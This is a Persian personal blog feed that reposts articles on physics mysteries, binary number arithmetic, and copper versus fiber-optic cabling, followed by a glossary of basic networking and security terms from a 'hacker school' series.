کنند.برنامه‌نویسی نرم‌افزار کاربردی در مقابل برنامه‌نویسی سیستمبرنامه‌نویس‌های رایانه اغلب به دو گروه گسترده تقسیم می‌شوند: برنامه‌نویس‌های نرم‌افزار کاربردی و برنامه‌نویس‌های سیستم. برنامه‌نویس‌های نرم‌افزار کاربردی برنامه‌هایی می‌نویسند تا به وظیفه مشخصی رسیدگی کنند، مانند برنامه‌ای برای پی‌گیری سیاهه در یک سازمان. این گروه از برنامه‌نویس‌ها همچنین می‌توانند نرم‌افزار بسته‌بندی‌شده را اصلاح کنند یا نرم‌افزارهای کاربردی عمومی را که مکرراً از فروشنده‌های نرم‌افزار مستقل خریداری می‌شوند سفارشی کنند. در حالی که، برنامه‌نویس‌های سیستم، برنامه‌هایی برای نگهداری و بررسی نرم‌افزار سیستم‌های رایانه‌ای می‌نویسند، مانند سیستم‌های عامل و سامانه‌های مدیریت پایگاه داده‌ها. این گروه از برنامه‌نویس‌ها در دستورالعمل‌هایی که مشخص می‌کنند چگونه شبکه، پایانه‌های رایانه رومیزی (معمولاً شبکه شده و قدرتمندتر از رایانه شخصی هستند) (به انگلیسی: Workstations) و واحد پردازش مرکزی سیستم وظیفه‌های گوناگونی که به آن‌ها داده شده‌اند را رسیدگی می‌کنند و چگونه با تجهیزات جانبی مانند چاپگرها و دیسک‌گردان ارتباط برقرار می‌کنند تغییر ایجاد می‌کنند.ایدا لاولیس به‌عنوان نخستین برنامه‌نویس رایانه شناخته می‌شود. https://fa.wikipedia.org/wiki/%D8%A8%D8%B1%D9%86%D8%A7%D9%85%D9%87%E2%80%8C%D9%86%D9%88%DB%8C%D8%B3

۱۰ راز حل نشده‌ی بزرگ علم فیزیک

localho3t — Mon, 27 Apr 2020 03:10:09 +0430

داشتم ت اینترنت می گشتم یهو چشمم به یه چیز باحال خورد گفتم براتون بزارم امیدوارم خوشتون بیاد .سال ۱۹۰۰ میلادی لُرد کلوین اعلام کرد که مورد جدیدی برای کشف شدن در فیزیک باقی نمانده و تنها اندازه‌گیری‌های بیشتر و دقیق‌تر است که باقی می‌ماند. در طول سه دهه پس از این نظریه عجیب، مکانیک کوانتوم و نظریه‌ی نسبیت انیشتین آنچه را که انسان تا آن زمان از فیزیک می‌شناخت، تغییر داد.امروزه هیچ دانشمندی جرأت اعلام نظریه‌ای مانند لُرد کلوین را به خود نمی‌دهد، به نظر می‌رسد فیزیک جعبه‌ی پاندورای شگفت انگیزی است که با هر جواب سؤالات بیشتر و بزرگتری در آن مطرح می‌شود، سرشناس‌ترین دانشمندان دنیا سال‌هاست پیشرفته‌ترین تجهیزات علمی را با هزینه‌های سرسام‌آور در اختیار گرفته‌اند و عمر خود را صرف تحقیق روی عجایب جهان می‌کنند اما اگر واقع‌بین باشیم یافته‌های بیشمار هر روزه‌ی ما در برابر چیزی که نمی‌دانیم ناچیز به نظر می‌رسد. در ادامه با ۱۰ سوال از بزرگترین شگفتی‌های علم فیزیک آشنا خواهید شد.۱ – ماهیت انرژی تاریکتمامی محاسبات مقداری بسیار بیشتر از ماده‌ی قابل مشاهده در جهان را نشان می‌دهند. در حالی که نیروی جاذبه با کشیدن فضا-زمان به داخل سعی دارد از هم گسستگی و انبساط جهان جلوگیری کند اما کهکشان‌ها سریع و سریع‌تر از گذشته و با سرعتی بیشتر از سرعت نور از یکدیگر دور می‌شوند، به نظر می‌رسد نیرویی منفی مانند سپری نامرئی نیروی جاذبه را از فضا-زمان جدا می‌کند. در مدل پذیرفته شده از جهان از این سپر با نام ثابت کیهانی یاد می‌شود، همان چیزی که به عنوان انرژی تاریک مشهور شده است. با گسترش جهان هر لحظه فضای بیشتری ایجاد می‌شود و به همان میزان، مقدار انرژی تاریک جهان نیز بیشتر می‌شود. بر اساس نرخ مشاهدات از گسترش فضا-زمان دانشمندان حدس می‌زنند در مجموع بیشتر از ۷۰ درصد از کل نیروهای موجود در جهان را این انرژی ناشناخته تشکیل می‌دهد؛ در حقیقت ما می‌دانیم که جهان مملو از این انرژی است اما نمی‌دانیم که چگونه باید به آن نگاه کنیم.۲ – ماده‌ی تاریک چیست؟می‌دانیم که حدود ۸۴ درصد از ماده در جهان نه نوری را جذب می‌‌کنند و نه نوری از خود منتشر می‌کنند، چیزی که به آن ماده‌ی تاریک گفته می‌شود. ماده‌ی تاریک حتی به صورت غیر مستقیم نیز قابل مشاهده نیست اما وجود آن از طریق تأثیر بر نیروی گرانشی ماده‌ی مرئی، اشعه و ساختار انبساطی جهان قابل اثبات است. به نظر می‌رسد فضاهای بین کهکشانی مملو از این ماده‌ی عجیب باشند و ممکن است آن‌ها از ذرات بنیادی ناپایداری که بنا بر قوانین مکانیک کوانتوم دائماً در فضای بین کهکشانی به وجود می‌آیند و از بین می‌روند (WIMP) به وجود آمده باشند. تلسکوپ و آشکارسازهای زیادی در سراسر کره‌ی زمین و خارج از جو به بررسی WIMP ها اختصاص یافته‌اند اما هنوز هیچ‌کس نمی‌داند ماده‌ی تاریک از چه ساخته شده است.۳- آیا جهان‌های موازی وجود دارند؟اطلاعات اختر فیزیک‌شناسان نشان می‌دهد که فضا-زمان ممکن است مسطح باشد به جای آن که منحنی باشد و این یعنی در تمام جهات فضا-زمان تا بی‌نهایت ادامه خواهد داشت. اگر چنین باشد پس منطقه‌ای که ما می‌توانیم ببینیم و فکر می‌کنیم جهان هستی باشد فقط قسمتی در بی نهایت است، اما همزمان فیزیک کوانتوم به ما می‌گوید فقط تعداد محدودی از تنظیمات ذرات (۱۰^۱۰^۲۲) در هر تکه‌ی کیهانی می‌تواند وجود داشته باشد و با این تعداد محدود در تکه‌های نامحدود از جهان، ذرات مجبورند تنظیمات خود را بارها و بارها تا بی‌نهایت تکرار کنند. این به معنای آن است که تکه‌های کیهانی دقیقاً همانند جهان ما (حاوی کسی مثل من و شما) وجود خواهند داشت، همچنین تکه‌های کیهانی وجود خواهند داشت که دقیقاً شبیه ما هستند اما فقط با یک ذره تفاوت، و تکه‌های کیهانی دقیقاً شبیه ما با دو ذره تفاوت و... این منطق عجیب که قوانین فیزیک به ما دیکته می‌کند همان چیزی است که به نام جهان‌های موازی می‌شناسیم. اما اگر بی نهایت جهان شبیه به جهان ما وجود دارد چرا تاکنون نتوانسته‌ایم آن‌ها را کشف کنیم و اصولاً چگونه باید آن‌ها را ببینیم؟۴ – چرا ماده‌ی بیشتری در برابر ضد ماده به وجود آمده است؟جواب به این سؤال چگونگی به وجود‌ آمدن جهان ما را توضیح می‌دهد. بر طبق قوانین فیزیک فرض بر این است که در لحظه‌ی مهبانگ باید مقدار برابری ماده و ضد ماده به وجود آمده باشد، اما اگر چنین بود جهان تاکنون باید از بین می‌رفت. الکترون‌ها در برخورد با پوزیترون، نورترون‌ها با ضد نوترون و به همین ترتیب بقیه‌ی ذرات در برخورد با ضد خود باید از بین می‌رفتند و در نهایت تنها چیزی که باقی می‌ماند دریایی از فوتون‌ها در جهانی بدون ماده است. به دلایلی مقدار بیشتری از ماده نسبت به ضد ماده به وجود آمده است که در نتیجه باعث تشکیل جهان ما شده است، اما هنوز توضیح قابل قبولی برای این حقیقت وجود ندارد.۵ – سرنوشت نهایی جهان چه خواهد بود؟سرنوشت جهان شدیداً به عامل ناشناخته‌ی Ω وابسته است. Ω میزان چگالی ماده در برابر انرژی پراکنده شده در سراسر جهان را نشان می‌دهد و سه حالت می‌تواند داشته باشد، کمتر از یک، بیشتر از یک و برابر با یک.اگر Ω بزرگ‌تر از یک باشد یعنی فضا-زمان بسته است مانند سطح یک کره‌ی فوق‌العاده بزرگ که از هر طرف به جای اول می‌رسد. اگر جهان را بسته متصور شویم و انرژی تاریک را در نظر نگیریم سرنوشت جهان ما این‌گونه رقم خواهد خورد که انبساط جهان زمانی متوقف شده و سپس انقباض جهانی شروع خواهد شد و این انقباض سرانجام کل جهان را در نقطه‌ای جمع و فشرده خواهد کرد. این له شدگی بزرگ برخلاف انفجار بزرگی است که جهان از آن زاییده شده است. اما اگر همچنان جهان را بسته تصور کنیم و انرژی تاریک نیز وجود داشته باشد جهان کروی ما تا ابد گسترش خواهد یافت.اما اگر Ω را کمتر از یک در نظر بگیریم پس فضا-زمان باز خواهد بود، سطح یک زین را تصور کنید! در این حالت سرنوشت نهایی جهان ابتدا انجماد بزرگ و سپس از هم گسستگی بزرگ خواهد بود. در این نظریه در زمانی سرعت انبساط جهان به حدی خواهد رسید که ستاره‌ها و کهکشان‌ها از هم گسسته شده و در فضای بین کهکشانی پخش خواهند شد، در نتیجه‌ی آن تمام ذرات هستی تنها و بسیار سرد رها خواهند شد. اما این پایان نهایی دنیا نیست، پس از این مرحله رشد بسیار قوی انبساط، جهان را به جایی خواهد رساند که حتی اثر نیروهای بین اتمی نیز خنثی شده و ذرات بنیادی از درون متلاشی خواهند شد و در فضای بیکران پراکنده می‌شوند.حالت سوم این است که Ω برابر با یک باشد. در این حالت جهان ما بدون خمیدگی و صاف خواهد بود و در تمام جهات به صورت نامحدود گسترش خواهد یافت. اگر انرژی تاریک وجود نداشته باشد این جهان مسطح برای همیشه با یک نرخ شتاب منفی گسترش خواهد یافت تازمانی که این شتاب به صفر برسد و جهان در حالتی پایدار باقی بماند، اما اگر انرژی تاریک وجود داشته باشد سرنوشت نهایی جهان گسترش همیشگی و در نهایت انجماد بزرگ و سپس از هم گسستگی بزرگ خواهد بود.۶ – چگونه اندازه‌گیری باعث فروپاشی تابع موج می‌شود؟در قلمرو عجیب و غریب الکترون‌ها، فوتون‌ها و دیگر ذرات بنیادی؛ قوانین فیزیک کوانتوم رفتارها را مشخص می‌کنند. در این اندازه ذرات نه مانند توپ‌های کوچک بلکه مثل امواجی که در فضایی بزرگ رها شده باشند، رفتار می‌کنند. هر ذره با یک تابع موج یا توزیع احتمال توضیح داده می‌شود. این توزیع احتمال به ما می‌گوید که مکان، سرعت و دیگر خواص هر متغیر چه مقادیری می‌تواند داشته باشد، اما دقیقاً نمی‌توانیم مقدارها را از آن به دست بیاوریم. تابع موج دامنه‌ای از احتمالات را به ما می‌دهد تا زمانی که بتوانیم با آزمایش و به صورت تجربی میزان و مکان دقیق هر ذره را به دست بیاوریم. اما برای به دست آوردن مقدار دقیق مانعی وجود دارد. هنگام اندازه‌گیری خواص ذرات تغییر کرده و نمی‌توانیم نتیجه‌ای را به دست بیاوریم. اما چگونه و چرا اندازه‌گیری یک ذره باعث فروپاشی تابع موج آن می‌شود؟ این مشکل که به نام خطای اندازه‌گیری شناخته می‌شود مانع بزرگی در برابر شناخت ما از جهان است. درک اینکه واقعیت چیست و آیا اصلاً واقعیتی وجود دارد همه در گرو جواب به این سؤال است.۷ – آیا نظریه‌ی ریسمان صحیح است؟زمانی فیزیک‌دانان تصمیم گرفتند تمام ذرات بنیادی را ریسمان‌های تک بعدی تصور کنند. ریسمان‌هایی که به دور خود پیچیده شده و تفاوت آن‌ها در فرکانس متفاوت ارتعاشات آن‌ها است. با به وجود آمدن این نظریه علم فیزیک بسیار ساده‌تر شد؛ با نظریه‌ی ریسمان فیزیک‌دانان توانستند قوانین فیزیک کوانتوم را با قوانین حاکم بر فضا-زمان یعنی نسبیت عام آشتی دهند و چهار نیروی طبیعت را در قالب یک چارچوب و نظریه‌ی واحد جای دهند. اما مشکل از آن جایی شروع می‌شود که نظریه‌ی ریسمان فقط در فضایی ۱۰ یا ۱۱ بعدی می‌تواند کار کند. ۳ بعد فضای بزرگ که آن را می‌توانیم ببینیم به علاوه‌ی ۶ یا ۷ بعد فضای فشرده و بسیار ریز و بُعد زمان. اندازه‌ی فضاهای فشرده همانند خود این ریسمان‌های لرزنده چیزی حدود یک میلیاردم اندازه‌ی هسته‌ی اتم هستند. هیچ راه شناخته شده و یا حتی قابل تصوری برای بررسی اندازه‌ای به این کوچکی وجود ندارد و در نتیجه هیچ راهی نیز برای اثبات تجربی نظریه‌ی ریسمان وجود نخواهد داشت.۸ – چرا پیکان زمان یک طرفه است؟حرکت رو به جلوی زمان را با ویژگی از جهان به نام آنتروپی توضیح می‌دهند. تقریباً آنتروپی را می‌توان با میزان بی‌نظمی در جهان توضیح داد. همانگونه که بی‌نظمی رو به افزایش است زمان نیز رو به جلو حرکت می‌کند. این حقیقت که آنتروپی در حال افزایش است را می‌توان با این منطق توضیح داد که میزان بیشتری از ترتیب‌های بی‌نظم نسبت به ترتیب‌های منظم در جهان وجود دارد و به همین دلیل ذرات تمایل دارند به سمت بی‌نظمی حرکت کنند تا به سمت منظم شدن. اما سؤال پیش آمده این است که چرا آنتروپی در گذشته بسیار پایین بوده است؟ به بیان دیگر آیا به دلیل همین آنتروپی بسیار پایین، جهان در آغاز خود از بی‌نهایت ماده و انرژی در نقطه‌ای بسیار کوچک تشکیل شده بود و پس از تولد به سرعت به اطراف منتشر شده است؟ برای درک بهتر این موضوع توصیه می‌کنیم مقاله‌ی پیشین ما در مورد حرکت رو به جلوی پیکان زمان مطالعه کنید.۹ – آیا در بی‌نظمی، نظمی نهفته است؟فیزیک‌دانان نمی‌توانند بعضی از رفتارهای سیالات، از مایعات مانند آب گرفته تا گازها و دیگر سیالات را پیش‌بینی کرده و به جواب‌های منطبق بر آزمایش‌های تجربی برسند. در حقیقت حتی مشخص نیست که آیا راه حلی کلی برای آنچه معادلات ناویر-استوکس نامیده می‌شود وجود دارد و اگر وجود دارد آیا می‌تواند رفتار مایعات را در همه‌جا به درستی تشریح کرده و نقاط ناشناخته‌ی تکینه را توضیح دهد. به علت همین مشکلات به نظر می‌رسد ماهیت هرج و مرج هنوز به خوبی شناخته نشده است. فیزیک‌دانان و ریاضی‌دانان متعجب می‌شوند وقتی به درستی نمی‌توانند وضعیت آب و هوا را پیش‌بینی کنند. آیا این آشفتگی‌ها ذاتاً غیر قابل پیش‌بینی است؟ آیا توربولانس از معادلات ریاضی فراتر می‌رود؟ و یا سرانجام با معادله‌ی ریاضی صحیح به نتیجه‌ای کلی خواهیم رسید؟۱۰ – گرانش چگونه کار می‌کند؟همه‌ی ما می‌دانیم که گرانش ماه باعث به وجود آمدن جز و مد در زمین و گرانش خورشید باعث گردش زمین به دور آن و ماندن سیاره‌ی ما در مدار خورشید می‌شود. اما درک ما از این واقعیت چقدر است؟ گرانش نیروی قدرتمندی است که از مواد ایجاد می‌شود و اجسام سنگین‌تر با گرانش بالاتر اجسام سبک‌تر را به سمت خود جذب می‌کنند. در حالی که دانشمندان تحقیقات زیادی را روی تأثیرات این نیرو انجام داده‌اند اما هنوز مطمئن نشده‌اند که چرا این نیرو وجود دارد. چرا نیرویی که اتم‌ها را درکنار یکدیگر نگه می‌دارد متفاوت از جاذبه است؟ آیا جاذبه یک ذره است؟ این‌ها سؤالاتی است که هنوز دانش کنونی ما از فیزیک توانایی پاسخ گویی به آن‌ها را ندارد. https://www.zoomit.ir/2015/1/31/17271/the-10-biggest-unsolved-mysteries-in-physics/

دنیای دو دو یی D:

localho3t — Mon, 20 Apr 2020 02:34:22 +0430

با سلام خدمت دوستای عزیز و بابت تاخخیر چند هفته ای معذرت میخوام با تیم بودیم سر یه پروژه و کلی سرمون شلوغ بود.خب بریم سر مقاله امروز و امیدوارم خوشتون بیاد.تاریچه:اولین شرح از سیستم عددی دو دویی در قرن 2 قبل از میلاد یا 5 قبل از میلاد توسط پینگالا(pingala ) ارائه شد. پینگالا سیستم عددی دو دویی را در ارتباط با وزن های شعری ودیک (Vedic) با هجاهای بلند و کوتاه توصیف کرد. سیستم عددی دو دویی جدید اول بار به صورت مستند توسط گاتفرید لاینبتیز (Gottfried Leibniz) ارائه شد. سیستم عددی پینگال با یک شروع می شد ولی سیستم عددی لاینبتیز و کامپیوترهای جدید از صفر شروع می شود.در سال 1854، ریاضی دان انگلیسی ،جرج بول ( George Boole) نوعی عملیات منطقی را ارائه داد که با نام جبر بولی شناخته شد. سیستم منطقی بول در توسعه سیستم های دو دویی به خصوص در اجرای آن در مدارهای الکترونیکی مؤثر واقع شد.اعداد باینری چیست؟در اعداد باینری تنها دو رقم ۰ و ۱ وجود دارد که در علم کامپیوتر نمایانگر روشن یا خاموش بودن سیگنال‌ هاست و ما به صورت روزمره از مبنای ده استفاده می‌کنیم که در آن ارقام از ۰ تا ۹ بوده و ارزش هر رقم ده برابر رقم سمت راست خود است. در باینری نیز اساس همین است و ارقام ۰ و ۱ پشت سر هم چیده شده‌اند و هر رقم دو برابر رقم سمت راست خود ارزش دارد.محاسبه‌ی باینری؟راست‌ترین رقم ارزش ۲۰ دارد، رقم سمت چپ آن ارزش ۲۱ برابر، چپی ۲۲ برابر و به همین شکل تا چپ‌ترین رقم. بنابراین ۱۱۱۱ در باینری معادل ۱*۸+۱*۴+۱*۲+۱*۱ یعنی ۱۵ است. شاید در نظر ما باینری بی‌هدف و کم‌کاربرد باشد، اما برای کامپیوتر اینگونه نیست و این مبنای اعداد بهترین روش برای ارائه‌ی اطلاعات به سخت‌افزار است.روش دیگر مورد استفاده در برنامه‌نویسی، مبنای ۱۶ است. البته کامپیوتر مستقیما آن را درک نمی‌کند، اما برنامه‌نویسان می‌توانند از آن برای ارائه‌ی ساده‌تری از باینری استفاده کنند. در مبنای ۱۶ از ارقام ۰ تا ۹ و همچنین حروف A تا F(برای ۱۰ تا ۱۵) استفاده می‌شود.جمعساده ترین عملیات ریاضی در دودویی، جمع است. جمع زدن دو عدد تک رقمی دودویی نسبتاً ساده است:0 + 0 = 0 0 + 1 = 11 + 1 = 10 (رقم یک منتقل می شود)هنگامی که نتیجه جمع از مقدار مبنا تجاوز می کند "عدد یک به سمت چپ منتقل" و به محل بعدی اضافه می شود. 1 1 1 1 (منتتقل شده) 0 1 1 0 1+ 1 0 1 1 1-------------------1 0 0 1 0 0 = شروع از ستون سمت راست، 1+1=10، رقم 1 به سمت چپ منتقل می شود و در پایین ستون 0 نوشته می شود. دومین ستون از سمت راست جمع زده می شود 1+1+0=10 دوباره 1 منتقل و 0 در پایین نوشته می شود ستون سوم، 1+1+1=11. این بار عدد 1 منتقل و درپایین ستون،1 نوشته می شود به همین صورت جواب 100100 به دست می آید.تفریقدر تفریق هم تا حد زیادی به همان صورت کار می کنند:0 – 0 = 00 – 1 = 1 (قرض گرفته شده)1 – 0 = 11 – 1 = 0* * * * (از ستون های ستاره دار قرض گرفته شده است)1 1 0 1 1 1 0- 1 0 1 1 1-----------------= 1 0 1 0 1 1 1تفریق یک عدد مثبت از یک عدد دیگر مثل "جمع" منفی قدر مطلق آن با آن عدد است. کامپیوترها برای نمایش مقادیر منفی از مکمل عدد دو استفاده می کنند. برای جزئیات بیشتر مکمل عدد دو را ببیند.ضربدو عدد "A" و "B" را با ضرب جزئی (partial) می توان در هم ضرب کرد برای هر رقم "B" حاصل ضرب آن را در عدد "A" به دست آورده و بر روی خطی جدید زیر رقم ضرب شده از "B" بنویسید. در آخر مجموع تمام ضرب های جرئی را محاسبه کنید. برای مثال دو عدد 1010 و 1011 به صورت زیر در هم ضرب می شوند:*} 1 0 1 1 (A) * 1 0 10 (B) ---------- 0 0 0 0 B به خاطر رقم صفر عدد 1 0 1 1 B به خاطر رقم یک عدد 0 0 0 0 + 1 0 1 1 ------------------ = 1 1 0 1 1 1 0تقسیمتقسیم در مبنای دو نیز همانند تقسیم ده دهی است.در اینجا مقسوم علیه 1012 یا عدد5 است. 1 1 0 1 1 1 0 1 1 0 1 1 0 -------- 0 1 1 0 0 0 -------- 1 1 1 1 0 1 -------- 0 1همانند ضرب های طولانی ده دهی سه رقم از مقسوم جدا و آن را بر مقسوم علیه تقسیم می کنیم بنابراین در خارج قسمت عدد1 را می نویسیم عدد یک از مقسوم علیه ضرب و حاصل از سه رقم جدا شده کم می شود. رقم بعدی "1" اضافه می شود. این کار ادامه پیدا می کند تا جایی که رقم های مقسوم تمام شود.بنابراین خارج قسمت تقسیم 11011 بر 101 برابر 1012 و باقی مانده 102 است.اعداد مبنای شانزدهتبدیل اعداد دودویی به مبنای شانزده و برعکس تا حدودی ساده است. به این خاطر که شانزده توانی از مبنای سیستم های دودوی (2) است. به طور دقیق تر، 24 = 16، و برای نمایش یک رقم در مبنای 16 از چهار رقم در مبنای 2 استفاده می شود.جدول زیر هر سری چهار رقمی مبنای دو و معادل مبنای شانزده آن را نمایش می دهد.مبنای 16 مبنای 20000 00001 10010 20011 30100 40101 50110 60111 71000 81001 91010 A1011 B1100 C1101 D1110 E1111 Fبرای تبدیل یک عدد مبنای شانزده به دودویی معادلش، به سادگی معادل ها را جایگزین کنید. مثلاً:3A در مبنای شانزده = 0011 1010 در مبنای دوE7 در مبنای شانزده = 1110 0111 در مبنای دوبرای تبدیل یک عدد مبنای به مبنای شانزده آن را به گروه های چهارتایی تقسیم می کنیم، اگر تعداد ارقام مضرب چهار نیست در سمت چپ به تعداد لازم 0 قرار می دهیم مبنای شانزده. برای مثال:1010010 مبنای دو = 0101 0010 مبنای دو = 52 مبنای شانزده11011101 مبنای دو = 1101 1101 مبنای دو = DD مبنای شانزدهمبنای هشتاعداد دودویی به راحتی به مبنای هشت تبدیل می شوند. چون این سیستم اعداد از پایه ی 8 استفاده می کنند که توانی از دو است ( 23، بنابراین هر سه رقم مبنای 2 معادل یک رقم مبنای هشت است). برای هشت عنصر اول جدول بالا رابطه بین دودویی و مبنای هشت همانند دودویی و مبنای شانزده است.تبدیل اعداد مبنای هشت به دو مانند مبنای شانزده به دو است.65 مبنای هشت = 110 101 مبنای دو17 مبنای هشت = 001 111 مبنای دوو از دودویی به مبنای هشت:101100 مبنای دو = 101 100 مبنای دو = 54 مبنای هشت10011 مبنای دو = 010 011 مبنای دو = 23 مبنای هشتامیدوارم که خوشتون اومده باشه. http://daneshnameh.roshd.ir/mavara/mavara-index.php?page=%d8%b3%db%8c%d8%b3%d8%aa%d9%85+%d8%a7%d8%b9%d8%af%d8%a7%d8%af+%d8%af%d9%88+%d8%af%d9%88%db%8c%db%8c&SSOReturnPage=Check&Rand=0 https://www.persiantools.com/more/article/%D8%A8%D8%A7%DB%8C%D9%86%D8%B1%DB%8C-%DA%86%DB%8C%D8%B3%D8%AA/

کابل مسی یا فیبر نوری ؟

localho3t — Tue, 31 Mar 2020 03:47:21 +0430

راستش خیلی وقت بود سر دوره های Net Work نرفته بودم ؛ امروز داشتم اموزش های قدیمی شبکه رو دنبال میکردم و یهو یه چیزی زد به ذهنم و گفتم براتون بنویسم.مساله این روز های تازه به دوران رسیده ها اینه که من الان باید از کابل های فیبر نوری استفاده کنم یا کابل های مسی .خب راستش جواب این سوال یکم سخته ولی منطقیه ، شما به عنوان برنامه نویس از کدوم کابل استفاده میکردید؟ ( از دیدگاه یه برنامه نویس نه یک شبکه کار )خب حالا بیاین یکم با هم این مساله رو باز کنیم :این همه تعریف از کابل های فیبر نوری برای چیه ؟خب خب خب ؛ بریم سر کابل های فیبر نوری.اول از مزایا بگیم یا معایب؟مزایا برای فصل های طولانی ماندگاری بالایی دارد و به هزینه نصب آن برای فاصله های طولانی در مجموع ارزان تر است.بسیار باریک تر از کابل های مسی است.میزان افت سیگنال در فیبر نوری پایین تر از کابل های مسی است.وزن آنها در مقابل سیم های مسی پایین تر است. پهنا باند بسیار بالایی دارد.امنیت آن بسیار بالا است.خب این همه مزایا برای یک کابل قابل ستایشه اما یه سری واقعیت هایی ور هم باید بدونیم:اول از همه باید بگم که برای شبکه های کوچک بسیار پر هزینه هست و البته به نظر من کار خیلی خیلی مسخره ای هستش.دوم فقط افراد متخصص می تونن برای نصب این نوع شبکه ها کارآمد باشن. مسلما همه ما نمیتونیم متخصص کابل های فیبر نوری باشیم.( واقعیتی که هیچ کس نمیپذیرد )سوم زمانی که برای راه اندازی این نوع شبکه ها سپری میشه خیلی سر سام اوره اخه بار شیشس ن فلز :/خب پس تا اینجا فهمیدیم که درسته سرعتش بالاعه اما باید قبول کنیم که راه اندازی شبکه خانگی با این نوع کابل ها فکر خیلی خیلی بدیه.فهمیدیم که کابل های مسی خیلی خیلی ظریفن به طوری که اگه زیاد خمش کنیم میشکنه.و در اخر فهمیدیم هر مزیت وحشتناک خوبی یه سری واقعیت های منطقی رو داره.چرا کابل های مسی ؟از وقتی که من یادم میاد کابل های مسی بودن و هستن و خواهند بود.از اون جایی که کابل مسی یک دوران طولانی رو با متخصصان شبکه سر کرد یه جورایی مثل زبان php نمیتونن ازش دل بکنن با اینکه حتی قدیمی شده.از تلفن بگیر تا ماهواره و تلویزیون و مودم ها و تلفن و ... با این کابل به وجود اومدن و با این کابل هم وجود دارن پس نمیشه به همین سادگی هاا این کابل ها رو کنار زد. اما.....بریم سر Twisted Pair که امروزه پرکاربرد ترین کابل ها هستن .دلم میخواست در مورد کابل های coaxial صحبت کنم اما یه جورایی باید قبول کنیم که خیلی دِموده شده :|اما همین Twisted Pair ما در دل خودش دو نوع کابل داره : کابل هایی دارای حفاظ که برای انتقال داده با کاهش نویز استفاده میشه. STPکابل هایی بدون حفاظ که برای انقال داده استفاده میشه UTPمزایا Twisted Pair :هزینه پایین تر نسبت به فیبر نوری.مورد استفاده در تمامی مکان ها.قابل استفاده در تمامی توپولوژی ها.پرکاربرد ترین کابل در ایران :|معایب:سرعت پایین.دردسر بالا.نویز پذیری بیشتر نسبت به کابل های فیبر نوری.به راحتی میدان مغناطیسی آن به هم میریزد :|در هر صورت شبکه های کابلی در زندگی روزمره ما کاهش چشم گیری پیدا کردن و امروزه جای خود را به شبکه های بیسیم داده اند.اما همه ما چه برنامه نویس ها چه متخصصان شبکه و چه هکر ها و لمر ها میدانیم این کابل ها مانند هوا برای زمین است و وجود نداشتنشان ینی از بین رفتن اینترنت .مطمعنا کسی از این موضوع خوشش نمیاد.موفق و سر بلند باشید.#LocalHostحساب اینستاگرام تیم امنیتی TBS , ایدی تلگرامی مدیر تیم امنیتی TBS

مدرسه هکر ها -مفاهیم - قسمت اخر

localho3t — Sat, 28 Mar 2020 23:27:29 +0430

خب خب خب بالاخره به قسمت اخر مفاهیم رسیدیم و داریم به فصل اول نزدیک میشیم .قسمت 6 از مفاهیم کتاب مدرسه هکر ها تقدیم به شما دوستان عزیز:social engineering اقدام به دست آوردن یا تلاش برای بدست آوردن داده های غیرقابل اطمینان با اتصال فرد به افشای اطلاعات امن.spyware هر نرم افزاری که مخفیانه اطلاعات کاربر را از طریق اتصال به اینترنت کاربر بدون اطلاع او جمع آوری کند.SSH (Secure Shell) یا برنامه ای برای ورود به رایانه دیگر از طریق شبکه ، اجرای دستورات در یک دستگاه از راه دور و انتقال فایل ها از یک دستگاه به دستگاه دیگر.switch در شبکه ها ، دستگاهی که بسته های بین LAN را فیلتر و انتقال می دهد.TCP پروتکل کنترل انتقال. در حالی که پروتکل IP فقط با بسته ها سروکار دارد ، TCP به دو میزبان امکان ایجاد اتصال و تبادل جریان داده ها را می دهد. TCP تحویل داده ها را تضمین می کند و همچنین تضمین می کند که بسته ها به همان ترتیبی که ارسال شده اند تحویل داده می شوند.TCP/IP پروتکل کنترل انتقال / پروتکل اینترنت. مجموعه پروتکل های ارتباطی که برای اتصال میزبان در اینترنت استفاده می شود.tcpdump sniffer بسته ای که ترافیک را در رایانه شما ثبت می کند.Telnet پروتکل که به یک کاربر محلی اجازه می دهد تا به یک کامپیوتر از راه دور متصل شوند و به منابع خود دسترسی پیدا کنند.timebombs کدی که برای اجرای در یک زمان خاص در شبکه یا رایانه طراحی شده است ، به عنوان مثال وقتی تاریخ انقضا در یک نرم افزار آزمایشی رسیده است.topologies شکل شبکه محلی (LAN) یا سیستم ارتباطی دیگر.tracert ابزاری که یک بسته از رایانه شما را به یک میزبان اینترنت ردیابی می کند ، نشان می دهد که تعداد بسته ها را برای رسیدن به هاست و چه هک طول می کشد. آهنگ - حلقه ای روی دیسک که می توان داده ها را نوشت. فلاپی دیسک معمولی دارای 80 آهنگ (دو برابر) یا 160 (چگالی بالا) است. برای دیسک های سخت ، هر پلات به آهنگ ها تقسیم می شود ، و یک مکان آهنگ واحد که در تمام پلاترها (و هر دو طرف هر پلات) بریده می شود ، یک استوانه خوانده می شود. هارد دیسک هزاران سیلندر دارد.trojans برنامه تخریبی که به عنوان یک برنامه خوش خیم صورت می گیرد. بر خلاف ویروس ها ، تروجان ها خود را تکرار نمی کنند اما می توانند به همان اندازه مخرب باشند.Web Browser برنامه ای که به کاربران امکان اتصال به سرورهای وب و مشاهده صفحات ذخیره شده روی آنها را می دهد.Web Server رایانه ای که در آن صفحات وب برای دسترسی به سایر رایانه ها نگهداری می شود.blog - weblog صفحه وب که به عنوان یک ژورنال شخصی قابل دسترسی در دسترس عموم برای یک فرد است.Whois یک ابزار اینترنتی که اطلاعات مربوط به نام دامنه یا آدرس IP را برمی گرداند.World Wide Web -wwwخدماتی برای انتقال و ارائه متن هایپرتکست.worms برنامه یا الگوریتمی که خودش را از طریق شبکه رایانه ای تکرار می کند و معمولاً اقدامات مخرب مانند استفاده از منابع رایانه و احتمالاً خاموش کردن سیستم انجام می دهد.zine مجله کوچک و اغلب رایگان که معمولاً توسط سرگرمی ها و روزنامه نگاران آماتور تولید می شود.

مدرسه هکر ها - مفاهیم - قسمت 5

localho3t — Sat, 28 Mar 2020 00:04:34 +0430

